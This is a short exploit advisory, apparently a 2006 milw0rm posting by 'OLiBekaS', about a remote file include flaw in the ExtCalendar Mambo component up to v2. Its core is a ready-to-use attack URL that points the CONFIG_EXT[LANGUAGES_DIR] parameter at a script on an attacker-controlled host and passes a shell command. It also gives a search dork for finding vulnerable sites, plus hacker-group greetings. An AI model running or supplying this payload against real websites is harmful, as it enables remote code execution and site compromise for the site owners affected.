1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities
3 ###############################################################################
4
5 Discovered By OLiBekaS
6 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
7
8 dork : "powered by ExtCalendar v2"
9 Exploit :
10 http://[target]/[path]/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://[attacker]/cmd.tx
t?&cmd=ls
11
12 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
13
14 greatz:
15 ~~~~~
16 # Special greetz to my master effex and bEdAh‘oTaK ( thank man )
17 # To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yug
o^cloudy. and other
18
19 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
20
21 Contact:
22 ~~~~~~~
23
24 Nick: OLiBekaS
25 E−mail: olibekas[at]gmail[dot]Com
26 Homepage: http://bekas.6te.net
27
28 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− [ eof ] −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
29
30 # milw0rm.com [2006−07−17]
Page 1/1
com_extcalendar Mambo Component 2.0 Include Vulnerability
OLiBekaS
07/17/2006